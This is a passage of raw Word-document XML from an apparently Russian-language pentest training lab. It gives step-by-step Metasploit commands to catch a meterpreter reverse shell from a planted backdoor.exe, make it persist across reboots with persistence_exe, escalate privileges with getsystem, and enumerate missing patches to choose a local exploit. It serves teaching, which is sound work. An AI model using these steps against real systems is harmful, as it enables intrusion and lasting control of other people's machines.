          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> загружается на атакуемый ПК и запускается на нем. Будем считать, что это удалось успешно сделать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь нужно запустить хендлер, который будет принимать запросы от созданного бэкдора. Для этого в Kali Linux запускаем </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и в ней — хендлер, используя команду:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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use exploit/multi/handler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B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="99999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both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">У данного эксплоита нужно задать payload командой: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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set payload windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="99999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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">П</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">араметры </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> настроим так же, как они были заданы при генерации файла </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backdoor.exe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D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="934720"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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934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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В итоге должно получиться примерно так:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1170305"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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1703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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь запускаем полученный хендлер командой </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и ждем результатов. При этом backdoor.exe должен быть запущен на атакуемой системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1160780"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22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1607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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В итоге имеем сессию </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> на удаленном узле. Недостаток в том, что если сессия закроется на стороне клиента — то есть у Kali Linux, так как шелл относится к Reverse, — потребуется повторно запускать файл backdoor.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Поэтому обычно на следующем этапе закрепляются в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j93o5bwz8qii" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 4. Постэксплуатация и закрепление в системе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">При</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> пентесте зачастую требуется не просто подключиться к удаленному узлу, но и развить атаку, чтобы узнать возможные границы эксплуатации уязвимости. Для этого обычно используются модули </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post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D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Вернемся к предыдущему заданию и рассмотрим, как можно закрепиться в системе на примере модуля </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post/windows/manage/persistence_exe. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Он будет создавать сценарий автозапуска для выбранного файла, будут доступны разные уровни привилегий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">У этого модуля надо задать ряд параметров. Стоит заранее сделать бэкдор, но мы будем использовать созданный ранее файл backdoor.exe. Также надо учитывать уровень привилегий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1849120"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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849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jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="666666" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В полученной сессии meterpreter выполним команду: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/root/backdoor.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="273.6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run post/windows/manage/persistence_exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это запуск модуля </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post/windows/manage/persistence_exe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DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="273.6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REXENAME=backdoor.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — значение опции </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REXENAME</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, имя созданного бэкдора;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="273.6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REXEPATH=/root/backdoor.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — значение опции </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REXEPATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, путь к файлу бэкдора. Из этого каталога он загрузится на атакуемый сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1262380"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24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262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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы проверить, перезагружаем хост и запускаем заново хендлер:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="81788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8178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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно увидеть сервис в списке запущенных служб:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="365760"/>
            <wp:effectExtent b="0" l="0" r="0" t="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657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Style w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ihwrqz4td6tz" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 5. Повышение привилегий </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Часто</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> при пентесте требуется продемонстрировать, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">что можно повысить  привилегии после проникновения на удаленный узел. Это делают, как правило, эксплуатируя уязвимости в атакуемой системе.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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В некоторых ОС (Windows XP) достаточно выполнить команду </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">в meterpreter, чтобы получить привилегии учетной записи </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM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E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="131318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3131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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Это позволит создавать службы и закреплять систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В некоторых ОС (Windows 7) команда </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">может не сработать:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1046480"/>
            <wp:effectExtent b="0" l="0" r="0" t="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046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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Но на узле могут быть уязвимости, которые позволяют поднять права до уровня администратора или </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Задача злоумышленника — найти их.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Искать уязвимости можно следующими техниками.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Если шелл на удаленном ПК получен, можно найти установленные обновления и по ним сделать вывод о том, есть ли уязвимость. Для этого можно воспользоваться средствами </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wmi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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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wmic qfe get Caption,Description,HotFixID,InstalledOn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="99999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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="2140585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21405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jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно найти обновления через консоль </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для этого есть модуль: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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post/windows/gather/enum_patches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:shd w:fill="99999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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Его </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">можно запустить прямо из сессии </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter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F7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1499870"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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4998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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь можно проверить все рекомендации. Для этого выполним поиск эксплоита, связанного с конкретным обновлением MS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1868170"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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8681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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Выберем найденный эксплоит и попробуем его реализовать. Для этого у эксплоита надо настроить </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session id. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее рассмотрим, как это сделать.</w:t>
      </w:r>
    </w:p>
